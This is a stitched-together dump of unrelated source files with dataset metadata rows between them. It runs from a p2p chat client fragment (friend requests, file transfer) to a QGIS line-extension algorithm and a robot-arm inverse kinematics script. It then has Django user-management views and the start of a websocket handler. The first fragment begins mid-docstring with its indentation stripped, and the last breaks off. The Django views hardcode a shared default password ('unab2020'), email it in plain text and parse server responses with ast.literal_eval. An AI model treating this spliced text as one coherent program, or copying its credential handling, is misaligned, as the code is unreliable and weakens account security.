Destination->Requester (p2p client, friendCompletion) to (p2p server, this coroutine)
@param reader: StreamReader object
    @param writer: StreamWriter object
@param safe: crypto box
@param profileId: profile ID of logged in user
@param data: uid followed by hash of message
@param requests: (Optional) Recent outgoing friend requests {uid: message hash}
@return: Auth token
"""
if not requests:
requests = {}
# auth token
auth = None
try:
# verify required input data length
assert len(data) == 76
        # message hash, user id
mhash, uid = data[:-36], data[-36:]
# valid UUID
assert isValidUUID(uid) is True
except AssertionError:
logging.info("\t".join(("Invalid friend completion data received", "Data: {!r}".format(data))))
return b''.join((BFALSE, WRITE_END)), auth
if uid not in requests:
# check db for older requests
requests.update(getFriendRequests(safe, profileId))
# obtain request information for this user (uid)
try:
msg, timestamp, _, rowid = requests[uid]
except KeyError:
logging.warning("\t".join(("Friend Request Failure",
"No friend request found for given user ID", "UID: {!r}".format(uid))))
return b''.join((BFALSE, WRITE_END)), auth
# ensure our potential friend has the correct hash value for the friend request
try:
assert mhash.decode('ascii') == sha1(b''.join((uid, msg))).hexdigest()
except (UnicodeDecodeError, AssertionError):
logging.warning("\t".join(("Friend Request Failure", "Hash values do not match",
"Sent: {!r}".format(mhash),
"Local: {!r}".format(sha1(b''.join((uid, msg))).hexdigest()))))
return b''.join((BFALSE, WRITE_END)), auth
# hash value has matched, get public key
spub = getSigningKeys(safe, profileId)[1]
mpub = getMessageKeys(safe, profileId)[1]
# auth token sent to friend
token = bytes(str(uuid4()), encoding='ascii')
# create our auth token to be sent to server
auth = bytes(sha384(b''.join((uid, token))).hexdigest(), encoding='ascii')
# work out length of data
data = b''.join((token, spub, mpub))
# send length to read and auth token and public keys
writer.write(b''.join((bytes(str(len(data)), encoding='ascii'), WRITE_END, data)))
yield from writer.drain()
# recv back success to confirm storage of sent data by friend
success = yield from reader.readline()
try:
assert int(success[0]) == 49
int(success)
except (KeyError, ValueError):
logging.warning("\t".join(("Friend Request Warning",
"Friendship completion failed. Storage confirmation: {!r}".format(success))))
return b''.join((BFALSE, WRITE_END)), None
port = success[1:-1]
# receive length to read
data = yield from reader.readline()
try:
length = int(data)
except ValueError:
return b''.join((BFALSE, WRITE_END)), None
data = yield from reader.read(length)
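    # Reply layout: friend's auth token (36-byte UUID), signing public key
    # (64 bytes), then the message public key (remainder).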
fauth, spub, mpub = data[:36], data[36:100], data[100:]
try:
assert len(data) > 115
assert isValidUUID(fauth) is True
except AssertionError:
logging.error("\t".join(("Friend Request Failure",
"Invalid mask or public key provided", "Data: {!r}".format(data))))
return b''.join((BFALSE, WRITE_END)), None
    # create and store localised mask of friend's true ID
fmask = setUidMask(safe, profileId, uid)
# store friend's auth mask
# (the mask we use when submitting authorised requests to the hub server regarding this friend)
setFriendAuth(safe, profileId, fmask, fauth, auth)
# store public key for friend
storeAuthority(safe, profileId, fmask, spub, mpub)
# store address locally
setAddress(safe, profileId, fmask,
b':'.join((bytes(writer.transport.get_extra_info('peername')[0], encoding='ascii'), port)))
# delete local friend request storage
delFriendRequests(rowid)
# True for success of all required friendship steps, hash of auth token we sent to friend (must be sent to hub server)
return BTRUE, auth
@asyncio.coroutine
def requestSendFile(safe, profileId, mask, data):
"""
Handle and store request for file transfer
@param safe: crypto box
@param profileId: logged in user's profile ID
@param mask: local friend mask for given friend's user ID
    @param data: filename, size and checksum separated by PROFILE_VALUE_SEPARATOR, followed by the user ID
@return: user id, filename, size
"""
try:
filename, size, checksum = data[:-36].split(bytes(PROFILE_VALUE_SEPARATOR, encoding='utf-8'))
except ValueError:
logging.info("Invalid file request data recieved: {!r}".format(data))
return False
checksum = checksum[:-COMMAND_LENGTH]
# validate received data
try:
# sha1 hex length
assert len(checksum) == 40
# size in bytes must be integer
int(size)
except AssertionError:
logging.info("Invalid file request data received, checksum is not correct length: {!r}".format(checksum))
return False
except ValueError:
logging.info("Invalid file request data received, size is not an integer: {!r}".format(size))
return False
# store file transfer request
rowid = storeFileRequest(safe, profileId, outgoing=False, mask=mask, request=(filename, size, checksum))
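    # Return the sender's user ID (last 36 bytes of data) together with the
    # parsed request details and the local storage row id.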
return data[-36:], filename, size, checksum, rowid
@asyncio.coroutine
def sendFile(writer, safe, profileId, mask, checksum, expiry, blockSize=4098):
"""
Send file to from server to client destination
@param writer: StreamWriter object to client
@param safe: crypto box
@param profileId: logged in user's profile ID
@param mask: local friend mask for given friend's user ID
@param checksum: sha1 sum value of file to be sent
@param expiry: expire days for file transfer requests (config set value)
@param blockSize: total number of bytes to read at once
@return: True when file if completely sent, otherwise False
"""
try:
# obtain current requests for provided mask and clear expired requests
filename, size, rowid = getFileRequests(safe, profileId, outgoing=True, mask=mask, expire=expiry)[mask][checksum]
except KeyError:
logging.warning("\t".join(("File Transfer Failed",
"File transfer request does not exist for mask {} and checksum {}".format(mask, checksum))))
writer.write(NONEXISTANT)
yield from writer.drain()
return False
if not path.isfile(filename):
delFileRequests(rowid)
logging.warning("\t".join(("File Transfer Failed", "File no longer exists: {}".format(filename))))
writer.write(NONEXISTANT)
yield from writer.drain()
return False
# match file checksum to ensure the same file which was to be sent
# has not been modified since the original transfer request
cursum = sha1sum(filename)
if checksum != cursum:
# remove invalid transfer request
delFileRequests(rowid)
logging.warning("\t".join(("File Transfer Failed", "File has been modified",
"Filename: {}".format(filename),
"Original checksum: {}".format(checksum),
"Current checksum: {}".format(cursum))))
writer.write(MODIFIED_FILE)
yield from writer.drain()
return False
blockSize = int(blockSize)
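    # Stream the file to the peer in fixed-size chunks until EOF.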
with open(filename, 'rb') as fd:
for buf in iter(partial(fd.read, blockSize), b''):
writer.write(buf)
yield from writer.drain()
# remove file transfer request from storage
delFileRequests(rowid)
return True
@asyncio.coroutine
def receiveAvatar(reader, writer, safe, profileId, mask, checksum):
"""
Receive avatar update check from friend
@param reader: client streamreader object
@param writer: streamwriter object
@param safe: crypto box
@param profileId: logged in user's profile ID
@param mask: friend mask uid
@param checksum: avatar sha1 checksum
@return: '0' if avatar not updated, otherwise locally calculated checksum value of stored avatar
"""
if len(checksum) != 40:
logging.warning("Friend mask '{}' tried to send invalid checksum value: {!r}".format(mask, checksum))
return BFALSE
try:
checksum = checksum.decode('ascii')
except UnicodeDecodeError:
return BFALSE
# compare local checksum value
if checksum != getFriendChecksum(safe, profileId, mask):
writer.write(BTRUE)
yield from writer.drain()
else:
return BFALSE
# get size of avatar to read from friend
size = yield from reader.readline()
try:
size = int(size)
assert size < LIMIT_AVATAR_SIZE
except (ValueError, AssertionError):
logging.warning("Friend mask '{}' tried to send invalid avatar size value: {!r}".format(mask, size))
return BFALSE
writer.write(BTRUE)
yield from writer.drain()
# read avatar into memory
avatar = yield from reader.readexactly(size)
# store avatar
storedChecksum = updateFriendDetails(safe, profileId, mask, avatar=avatar)
# send locally calculated checksum value as verification of storage
return storedChecksum
@asyncio.coroutine
def receiveMessage(safe, profileId, mask, data):
"""
    Process data as a received message
@param data: bytes/bytestring of msg and uid sent by client
    @return: (rowid, user id, received message) if a message was received, else False
"""
# msg portion of data
msg = data[:-36 - COMMAND_LENGTH]
rowid = storeHistory(safe, profileId, mask, msg, fromFriend=True)
# uid, msg
return (rowid, data[-36:], msg) if msg else False
#######################
# P2P Client Handlers
#######################
@asyncio.coroutine
def inviteChat():
pass
| gpl-3.0 | 8,537,975,647,144,394,000 | 35.492013 | 127 | 0.651112 | false | 4.276301 | false | false | false |
t-hey/QGIS-Original | python/plugins/processing/algs/qgis/ExtendLines.py | 1 | 2995 | # -*- coding: utf-8 -*-
"""
***************************************************************************
ExtendLines.py
--------------------
Date : October 2016
Copyright : (C) 2016 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'October 2016'
__copyright__ = '(C) 2016, Nyall Dawson'
# This will get replaced with a git SHA1 when you do a git archive323
__revision__ = '$Format:%H$'
from qgis.core import (QgsProcessingParameterNumber,
QgsProcessingException,
QgsProcessing)
from processing.algs.qgis.QgisAlgorithm import QgisFeatureBasedAlgorithm
class ExtendLines(QgisFeatureBasedAlgorithm):
START_DISTANCE = 'START_DISTANCE'
END_DISTANCE = 'END_DISTANCE'
def group(self):
return self.tr('Vector geometry')
def __init__(self):
super().__init__()
self.start_distance = None
self.end_distance = None
def initParameters(self, config=None):
self.addParameter(QgsProcessingParameterNumber(self.START_DISTANCE,
self.tr('Start distance'), defaultValue=0.0))
self.addParameter(QgsProcessingParameterNumber(self.END_DISTANCE,
self.tr('End distance'), defaultValue=0.0))
def name(self):
return 'extendlines'
def displayName(self):
return self.tr('Extend lines')
def outputName(self):
return self.tr('Extended')
def inputLayerTypes(self):
return [QgsProcessing.TypeVectorLine]
def prepareAlgorithm(self, parameters, context, feedback):
self.start_distance = self.parameterAsDouble(parameters, self.START_DISTANCE, context)
self.end_distance = self.parameterAsDouble(parameters, self.END_DISTANCE, context)
return True
def processFeature(self, feature, context, feedback):
input_geometry = feature.geometry()
if input_geometry:
output_geometry = input_geometry.extendLine(self.start_distance, self.end_distance)
if not output_geometry:
raise QgsProcessingException(
self.tr('Error calculating extended line'))
feature.setGeometry(output_geometry)
return feature
| gpl-2.0 | 7,437,769,807,170,386,000 | 36.4375 | 100 | 0.535225 | false | 4.983361 | false | false | false |
studywolf/blog | InvKin/Arm.py | 1 | 7959 | '''
Copyright (C) 2013 Travis DeWolf
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import numpy as np
import scipy.optimize
class Arm3Link:
def __init__(self, q=None, q0=None, L=None):
"""Set up the basic parameters of the arm.
All lists are in order [shoulder, elbow, wrist].
q : np.array
the initial joint angles of the arm
q0 : np.array
the default (resting state) joint configuration
L : np.array
the arm segment lengths
"""
# initial joint angles
self.q = [.3, .3, 0] if q is None else q
# some default arm positions
self.q0 = np.array([np.pi/4, np.pi/4, np.pi/4]) if q0 is None else q0
# arm segment lengths
self.L = np.array([1, 1, 1]) if L is None else L
self.max_angles = [np.pi, np.pi, np.pi/4]
self.min_angles = [0, 0, -np.pi/4]
def get_xy(self, q=None):
"""Returns the corresponding hand xy coordinates for
a given set of joint angle values [shoulder, elbow, wrist],
and the above defined arm segment lengths, L
q : np.array
the list of current joint angles
returns : list
the [x,y] position of the arm
"""
if q is None:
q = self.q
x = self.L[0]*np.cos(q[0]) + \
self.L[1]*np.cos(q[0]+q[1]) + \
self.L[2]*np.cos(np.sum(q))
y = self.L[0]*np.sin(q[0]) + \
self.L[1]*np.sin(q[0]+q[1]) + \
self.L[2]*np.sin(np.sum(q))
return [x, y]
def inv_kin(self, xy):
"""This is just a quick write up to find the inverse kinematics
for a 3-link arm, using the SciPy optimize package minimization
function.
Given an (x,y) position of the hand, return a set of joint angles (q)
using constraint based minimization, constraint is to match hand (x,y),
minimize the distance of each joint from it's default position (q0).
xy : tuple
the desired xy position of the arm
returns : list
the optimal [shoulder, elbow, wrist] angle configuration
"""
def distance_to_default(q, *args):
"""Objective function to minimize
Calculates the euclidean distance through joint space to the
default arm configuration. The weight list allows the penalty of
each joint being away from the resting position to be scaled
differently, such that the arm tries to stay closer to resting
state more for higher weighted joints than those with a lower
weight.
q : np.array
the list of current joint angles
returns : scalar
euclidean distance to the default arm position
"""
# weights found with trial and error,
# get some wrist bend, but not much
weight = [1, 1, 1.3]
return np.sqrt(np.sum([(qi - q0i)**2 * wi
for qi, q0i, wi in zip(q, self.q0, weight)]))
def x_constraint(q, xy):
"""Returns the corresponding hand xy coordinates for
a given set of joint angle values [shoulder, elbow, wrist],
and the above defined arm segment lengths, L
q : np.array
the list of current joint angles
xy : np.array
current xy position (not used)
returns : np.array
the difference between current and desired x position
"""
x = (self.L[0]*np.cos(q[0]) + self.L[1]*np.cos(q[0]+q[1]) +
self.L[2]*np.cos(np.sum(q))) - xy[0]
return x
def y_constraint(q, xy):
"""Returns the corresponding hand xy coordinates for
a given set of joint angle values [shoulder, elbow, wrist],
and the above defined arm segment lengths, L
q : np.array
the list of current joint angles
xy : np.array
current xy position (not used)
returns : np.array
the difference between current and desired y position
"""
y = (self.L[0]*np.sin(q[0]) + self.L[1]*np.sin(q[0]+q[1]) +
self.L[2]*np.sin(np.sum(q))) - xy[1]
return y
def joint_limits_upper_constraint(q, xy):
"""Used in the function minimization such that the output from
this function must be greater than 0 to be successfully passed.
q : np.array
the current joint angles
xy : np.array
current xy position (not used)
returns : np.array
all > 0 if constraint matched
"""
return self.max_angles - q
def joint_limits_lower_constraint(q, xy):
"""Used in the function minimization such that the output from
this function must be greater than 0 to be successfully passed.
q : np.array
the current joint angles
xy : np.array
current xy position (not used)
returns : np.array
all > 0 if constraint matched
"""
return q - self.min_angles
return scipy.optimize.fmin_slsqp(
func=distance_to_default,
x0=self.q,
eqcons=[x_constraint,
y_constraint],
# uncomment to add in min / max angles for the joints
# ieqcons=[joint_limits_upper_constraint,
# joint_limits_lower_constraint],
args=(xy,),
iprint=0) # iprint=0 suppresses output
def test():
# ###########Test it!##################
arm = Arm3Link()
# set of desired (x,y) hand positions
x = np.arange(-.75, .75, .05)
y = np.arange(.25, .75, .05)
# threshold for printing out information, to find trouble spots
thresh = .025
count = 0
total_error = 0
# test it across the range of specified x and y values
for xi in range(len(x)):
for yi in range(len(y)):
# test the inv_kin function on a range of different targets
xy = [x[xi], y[yi]]
# run the inv_kin function, get the optimal joint angles
q = arm.inv_kin(xy=xy)
# find the (x,y) position of the hand given these angles
actual_xy = arm.get_xy(q)
# calculate the root squared error
error = np.sqrt(np.sum((np.array(xy) - np.array(actual_xy))**2))
# total the error
total_error += np.nan_to_num(error)
# if the error was high, print out more information
if np.sum(error) > thresh:
print('-------------------------')
print('Initial joint angles', arm.q)
print('Final joint angles: ', q)
print('Desired hand position: ', xy)
print('Actual hand position: ', actual_xy)
print('Error: ', error)
print('-------------------------')
count += 1
print('\n---------Results---------')
print('Total number of trials: ', count)
print('Total error: ', total_error)
print('-------------------------')
if __name__ == '__main__':
test()
| gpl-3.0 | 4,691,724,446,632,460,000 | 34.373333 | 79 | 0.547305 | false | 4.128112 | false | false | false |
Mansilla1/Sistema-SEC | apps/usuarios/views.py | 1 | 14404 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Code developed by Daniel Mansilla
from django.shortcuts import render, render_to_response, redirect
from django.views.generic import ListView, CreateView, DetailView, DeleteView, UpdateView, TemplateView
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseBadRequest
from django.core.urlresolvers import reverse_lazy
from django.core import serializers
from django.contrib.auth.models import User
from django.contrib.auth import login, logout
from django.utils import timezone
from django.template import RequestContext
# import django_excel as excel
from django.contrib import messages
from django.core.mail import send_mail
from django.conf import settings
import openpyxl
from openpyxl import Workbook
from openpyxl.styles import Font
from io import BytesIO
from Proyecto.utilities import generate_pdf
from random import randrange, uniform
import random
import requests
import ast
from django.db.models import Count
# from django.utils import simplejson
# import simplejson
from .forms import *
from .models import *
def login_user(request):
template_name = 'login/login.html'
logout(request)
username = password = ''
request.session['token'] = None
if request.POST:
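        # Authenticate against the remote REST endpoint; on success cache the
        # returned token and the user's basic details in the session.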
post_data = {'username': request.POST["username"],'password':request.POST["password"]}
response = requests.post('http://cubesoa.asuscomm.com:90/rest-auth/login/', data=post_data)
content = response.content
content = ast.literal_eval(content)
if "key" in content:
post_data2 = {'username': str(request.POST["username"])}
header = {'Content-Type':'application/json','Authorization':'Token ' + content['key']}
response2 = requests.get('http://cubesoa.asuscomm.com:90/rest-auth/user/',headers=header, data=post_data2)
content2 = response2.content
content2 = ast.literal_eval(content2)
request.session["pk"] = content2['pk']
request.session["first_name"] = content2['first_name']
request.session["last_name"] = content2['last_name']
request.session["email"] = content2['email']
request.session["token"] = content['key']
return HttpResponseRedirect(reverse_lazy('inicio'))
# elif
# return redirect('inicio')
return render(request, template_name, {})
# def index(request):
# # perfil_user = PerfilUsuario.objects.get(user__id=request.user.id)
# # usuarios = PerfilUsuario.objects.all().count()
# # contenidos = ProfeSesion.objects.filter(status=True).count()
# # preguntas = Pregunta.objects.filter(status=True).count()
# # evaluaciones = Evaluacion.objects.filter(disponible=True).count()
# # usuario_registrados = PerfilUsuario.objects.all().order_by('created_at')[:5].reverse()
# # ------------------------------------------
# # OBTENER RANKINGS
# # ------------------------------------------
# user_pregunta = User.objects.exclude(perfilusuario__tipo_usuario='Estudiante').annotate(preguntas=Count('pregunta')).order_by('-preguntas')[:5]
# user_evaluacion = User.objects.exclude(perfilusuario__tipo_usuario='Estudiante').annotate(evaluaciones=Count('evaluacion')).order_by('-evaluaciones')[:5]
# orden_preguntas = Pregunta.objects.all().order_by('-cant_usada')[:5]
# context = {
# 'user_pregunta': user_pregunta,
# 'user_evaluacion': user_evaluacion,
# 'orden_preguntas': orden_preguntas,
# # 'perfil_user': perfil_user,
# # 'usuarios': usuarios,
# # 'preguntas': preguntas,
# # 'contenidos': contenidos,
# # 'evaluaciones': evaluaciones,
# # 'usuario_registrados': usuario_registrados,
# }
# return render(request, 'index.html', context)
def usuarioList(request):
usuario = PerfilUsuario.objects.all()
context = {
'usuario': usuario,
}
return render(request, 'apps/usuarios/usuario_list.html', context)
def usuarioCreate(request):
if request.POST:
form = PerfilForm(request.POST)
form2 = RegistroForm(request.POST)
if form.is_valid() and form2.is_valid():
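            # Save the auth user first, then attach the profile record to it.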
form2 = form2.save(commit=False)
form2.save()
form = form.save(commit=False)
form.user = form2
form.save()
            # Get the username
user=form2.username
nombre = form.nombres + ' ' +form.apellido1 + ' ' +form.apellido2
contrasena = 'unab2020'
correo = form.email
tipouser = form.tipo_usuario
subject = 'Bienvenido al Portal SEC!'
message = 'Hola %s!\nusuario: %s, password: %s' % (nombre, user, contrasena)
send_mail(
subject,
message,
settings.EMAIL_HOST_USER,
[correo],
fail_silently=False,
)
return redirect('usuarios:listar')
else:
form = PerfilForm()
form2 = RegistroForm()
context = {
'form': form,
'form2': form2,
}
return render(request, 'apps/usuarios/usuario_create.html', context)
def usuarioUpdate(request, usuario_id):
# usuario = User.objects.get(id=usuario_id)
# id_user = int(usuario.id)
perfil = PerfilUsuario.objects.get(user=usuario_id)
if request.method == 'GET':
# form = RegistroForm(instance=usuario)
form = PerfilForm(instance=perfil)
else:
# form = RegistroForm(request.POST, instance=usuario)
form = PerfilForm(request.POST, instance=perfil)
if form.is_valid():
form.save()
# form2 = form2.save(commit=False)
# form2.user = usuario
# form2.save()
return redirect('usuarios:listar')
context = {
'form': form,
# 'form2': form2,
'perfil': perfil,
}
return render(request, 'apps/usuarios/usuario_update.html', context)
# class UsuarioDetail(DetailView):
# model = PerfilUsuario
# template_name = 'apps/usuarios/usuario_detail.html'
# context_object_name = 'usuario'
# def get_context_data(self, **kwargs):
# context = super(UsuarioDetail, self).get_context_data(**kwargs)
# context['title'] = 'Detalle de usuario'
# return context
def usuarioDelete(request, usuario_id):
usuario = User.objects.get(id=usuario_id)
if request.method == 'POST':
usuario.delete()
return redirect('usuarios:listar')
return render(request, 'apps/usuarios/usuario_delete.html', {'usuario':usuario})
#Planillas excel
def get_planilla_usuario(request):
    # generate the Excel workbook
wb = Workbook()
# ws = wb.create_sheet("Calificaciones",0)
ws = wb.active
ws.title = 'Usuarios'
# ws.font = ws.font.copy(bold=True, italic=True)
    # Header row
a1 = ws.cell(row=1, column=1, value='RUN')
a2 = ws.cell(row=1, column=2, value='Nombres')
a3 = ws.cell(row=1, column=3, value='Apellido Paterno')
a4 = ws.cell(row=1, column=4, value='Apellido Materno')
a5 = ws.cell(row=1, column=5, value='Email')
a6 = ws.cell(row=1, column=6, value='Usuario')
a7 = ws.cell(row=1, column=7, value='Tipo Usuario')
# a7 = ws.cell(row=1, column=7, value='¿Coordinador de asignatura? (si/no)')
a1.font = Font(bold=True)
a2.font = Font(bold=True)
a3.font = Font(bold=True)
a4.font = Font(bold=True)
a5.font = Font(bold=True)
a6.font = Font(bold=True)
a7.font = Font(bold=True)
nombre_archivo = 'Planilla_usuarios.xlsx'
response = HttpResponse(content_type="application/ms-excel")
contenido = "attachment; filename={0}".format(nombre_archivo)
response["Content-Disposition"] = contenido
wb.save(response)
return response
def upload(request):
if request.POST:
        # load the uploaded Excel file
        excel = request.FILES['archivo'].read() # read the uploaded file
        wb = openpyxl.load_workbook(filename=BytesIO(excel)) # open the workbook
        hojas = wb.get_sheet_names() # get the sheet names in the file
        hoja = wb.get_sheet_by_name(hojas[0]) # use the first sheet of the document
        total_filas = hoja.max_row # maximum number of rows to read
        total_columnas = hoja.max_column # maximum number of columns
        user_no_register = []
        # read/write loop
for i in range(2, total_filas+1):
            form = PerfilForm() # user profile form
            form2 = RegistroForm(request.POST or None) # user registration form
            # form3 = ProfesorForm()
            # form3_2 = CoordinadorForm()
            # form4 = EstudianteForm()
            # check whether the user already exists
            username = hoja.cell(row=i,column=6).value
            print(username)
try:
usuario = User.objects.get(username=username)
usuario = usuario.username
                print('usuario ya existe')
user_no_register += [usuario]
except:
rut = hoja.cell(row=i,column=1).value
nombre = hoja.cell(row=i,column=2).value
apellido1 = hoja.cell(row=i,column=3).value
apellido2 = hoja.cell(row=i,column=4).value
correo = hoja.cell(row=i,column=5).value
usuario = hoja.cell(row=i,column=6).value
tipo_usuario = hoja.cell(row=i,column=7).value
nombre = nombre.capitalize()
apellido1 = apellido1.capitalize()
apellido2 = apellido2.capitalize()
tipo_usuario = tipo_usuario.capitalize()
if tipo_usuario == 'Comité académico' or tipo_usuario == 'Comite académico' or tipo_usuario == 'Comité academico':
tipo_usuario = 'Comite academico'
                print(tipo_usuario)
# numero_random = randrange(100,999)
# contrasena = "%s%s%s%s" % (nombre[0].capitalize(),numero_random, apellido[:2], numero_random)
contrasena = "unab2020"
# form2.set_password(self.cleaned_data["password1"])
# form2.set_password(self.cleaned_data["password2"])
form2 = form2.save(commit=False)
form2.username = usuario
# form2.first_name = nombre
# form2.last_name = apellido
# form2.email = correo
form2.password1 = contrasena
form2.password2 = contrasena
form2.save()
form = form.save(commit=False)
form.rut = rut
form.nombres = nombre
form.apellido1 = apellido1
form.apellido2 = apellido2
form.email = correo
form.tipo_usuario = tipo_usuario
form.user = form2
form.save()
# if form.tipo_usuario == 'Docente':
# form3 = form3.save(commit=False)
# form3.usuario = form
# form3.save()
# # if coordinador=='si' or coordinador=='SI' or coordinador=='Si' or coordinador=='sI':
# # form3_2 = form3_2.save(commit=False)
# # form3_2.profesor = form
# # form3_2.save()
# elif form.tipo_usuario == 'Estudiante':
# form4 = form4.save(commit=False)
# form4.usuario = form
# form4.save()
            # Get the username
user =form2.username
nombre = "%s %s %s" %(form.nombres, form.apellido1, form.apellido2)
correo = form.email
tipouser = form.tipo_usuario
subject = 'Bienvenido al Portal SEC!'
message = 'usuario: %s, password %s' % (user, contrasena)
send_mail(
subject,
message,
settings.EMAIL_HOST_USER,
[correo],
fail_silently=False,
)
        print(user_no_register)
return redirect('usuarios:listar')
else:
form = PerfilForm()
form2 = RegistroForm()
# form3 = ProfesorForm()
# # form3_2 = CoordinadorForm()
# form4 = EstudianteForm()
context = {
'form': form,
'form2': form2,
# 'form3': form3,
# # 'form3_2': form3_2,
# 'form4': form4,
}
return render(request, 'apps/usuarios/usuario_upload.html', context)
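# The upload views above walk the worksheet cell-by-cell with hoja.cell(row=i, column=j)
# through the older get_sheet_names()/get_sheet_by_name() API. The helper below is an
# illustrative sketch only (its name is hypothetical) showing the same row loop with
# openpyxl's iter_rows(); the column order is assumed to match the template produced by
# get_planilla_usuario.
def _iter_upload_rows(worksheet):
    # Yield one tuple of cell values per data row, skipping the header row.
    for row in worksheet.iter_rows(min_row=2):
        yield tuple(cell.value for cell in row)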
# ESTUDIANTES
def estudiante_list(request):
estudiantes = Estudiante.objects.all()
return render(request, 'apps/usuarios/estudiantes_list.html', {'estudiantes': estudiantes})
def estudiante_create(request):
if request.POST:
form = EstudianteForm(request.POST)
if form.is_valid():
form.save()
return redirect('usuarios:listar_estudiantes')
else:
form = EstudianteForm()
context = {'form': form}
return render(request, 'apps/usuarios/estudiante_create.html', context)
def upload_estudiante(request):
if request.POST:
        # load the uploaded Excel file
        excel = request.FILES['archivo'].read() # read the uploaded file
        wb = openpyxl.load_workbook(filename=BytesIO(excel)) # open the workbook
        hojas = wb.get_sheet_names() # get the sheet names in the file
        hoja = wb.get_sheet_by_name(hojas[0]) # use the first sheet of the document
        total_filas = hoja.max_row # maximum number of rows to read
        total_columnas = hoja.max_column # maximum number of columns
        user_no_register = []
        # read/write loop
for i in range(2, total_filas+1):
            form = EstudianteForm() # student form
            # check whether the student already exists
rut = hoja.cell(row=i,column=1).value
estudiante_no_register = []
try:
estudiante = Estudiante.objects.get(rut=rut)
                print('estudiante ya existe')
estudiante_no_register += [estudiante]
except:
rut = hoja.cell(row=i,column=1).value
nombres = hoja.cell(row=i,column=2).value
apellido1 = hoja.cell(row=i,column=3).value
apellido2 = hoja.cell(row=i,column=4).value
correo = hoja.cell(row=i,column=5).value
nombre2 = ''
nombre3 = ''
nombres = nombres.capitalize()
apellido1 = apellido1.capitalize()
apellido2 = apellido2.capitalize()
form = form.save(commit=False)
form.rut = rut
form.nombre1 = nombres
form.nombre2 = nombre2
form.nombre3 = nombre3
form.apellido1 = apellido1
form.apellido2 = apellido2
form.email = correo
form.save()
        print(estudiante_no_register)
return redirect('usuarios:listar_estudiantes')
else:
form = EstudianteForm()
context = {
'form': form,
}
return render(request, 'apps/usuarios/estudiante_upload.html', context)
def get_planilla_estudiante(request):
    # generate the Excel workbook
wb = Workbook()
# ws = wb.create_sheet("Calificaciones",0)
ws = wb.active
ws.title = 'Estudiantes'
# ws.font = ws.font.copy(bold=True, italic=True)
    # Header row
a1 = ws.cell(row=1, column=1, value='RUN')
a2 = ws.cell(row=1, column=2, value='Nombres')
a3 = ws.cell(row=1, column=3, value='Apellido Paterno')
a4 = ws.cell(row=1, column=4, value='Apellido Materno')
a5 = ws.cell(row=1, column=5, value='Email')
a1.font = Font(bold=True)
a2.font = Font(bold=True)
a3.font = Font(bold=True)
a4.font = Font(bold=True)
a5.font = Font(bold=True)
nombre_archivo = 'Planilla_estudiantes.xlsx'
response = HttpResponse(content_type="application/ms-excel")
contenido = "attachment; filename={0}".format(nombre_archivo)
response["Content-Disposition"] = contenido
wb.save(response)
return response
# AJAX
class GetEstudiantes(TemplateView):
def get(self, request, *args, **kwargs):
estudiante = Estudiante.objects.all()
        print(estudiante)
data = serializers.serialize('json', estudiante)
return HttpResponse(data, content_type="application/json") | apache-2.0 | 1,000,900,255,023,441,300 | 29.313684 | 156 | 0.682317 | false | 2.691215 | false | false | false |
svenstaro/python-web-boilerplate | boilerplateapp/models/user.py | 1 | 2930 | """Module containing the `User` model."""
import uuid
import secrets
import string
from datetime import datetime
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy_utils.models import Timestamp
from flask import current_app
from boilerplateapp.extensions import db, passlib
class User(db.Model, Timestamp):
"""User model."""
id = db.Column(UUID(as_uuid=True), primary_key=True, nullable=False, default=uuid.uuid4)
email = db.Column(db.String(120), unique=True, nullable=False, index=True)
password_hash = db.Column(db.String(120), nullable=False)
current_auth_token = db.Column(db.String(32), index=True)
last_action = db.Column(db.DateTime)
def __init__(self, email, password):
"""Construct a `User`.
Accepts an `email` and a `password`. The password is securely hashed
before being written to the database.
"""
self.email = email
self.set_password(password)
def __repr__(self):
"""Format a `User` object."""
return '<User {email}>'.format(email=self.email)
def set_password(self, new_password):
"""Hash a given `new_password` and write it into the `User.password_hash` attribute.
        It does not add this change to the session, nor does it commit the transaction!
"""
self.password_hash = passlib.pwd_context.hash(new_password)
def verify_password(self, candidate_password):
"""Verify a given `candidate_password` against the password hash stored in the `User`.
Returns `True` if the password matches and `False` if it doesn't.
"""
return passlib.pwd_context.verify(candidate_password, self.password_hash)
def generate_auth_token(self):
"""Generate an auth token and save it to the `current_auth_token` column."""
alphabet = string.ascii_letters + string.digits
new_auth_token = ''.join(secrets.choice(alphabet) for i in range(32))
self.current_auth_token = new_auth_token
self.last_action = datetime.utcnow()
db.session.add(self)
db.session.commit()
return new_auth_token
@property
def has_valid_auth_token(self):
"""Return whether or not the user has a valid auth token."""
latest_valid_date = datetime.utcnow() - current_app.config['AUTH_TOKEN_TIMEOUT']
return (self.last_action and
self.last_action > latest_valid_date and
self.current_auth_token)
@staticmethod
def get_user_from_login_token(token):
"""Get a `User` from a login token.
A login token has this format:
<user uuid>:<auth token>
"""
user_id, auth_token = token.split(':')
user = db.session.query(User).get(user_id)
if user and user.current_auth_token:
if secrets.compare_digest(user.current_auth_token, auth_token):
return user
return None
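# Illustrative sketch (not part of the original model): how a client would assemble the
# login token consumed by get_user_from_login_token above. The "<user uuid>:<auth token>"
# format comes from that docstring; the function name is hypothetical and the user object
# is assumed to have already called generate_auth_token().
def build_login_token(user):
    """Return the token string a client sends back for authentication."""
    return '{id}:{token}'.format(id=user.id, token=user.current_auth_token)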
| mit | 2,480,630,203,031,518,700 | 35.17284 | 94 | 0.646075 | false | 3.943472 | false | false | false |
fdslight/fdslight | pywind/web/handlers/websocket.py | 1 | 8933 | #!/usr/bin/env python3
import pywind as tcp_handler
import pywind.web.lib.websocket as websocket
import pywind.web.lib.httputils as httputils
import socket, time
class ws_listener(tcp_handler.tcp_handler):
def init_func(self, creator, listen, is_ipv6=False):
if is_ipv6:
fa = socket.AF_INET6
else:
fa = socket.AF_INET
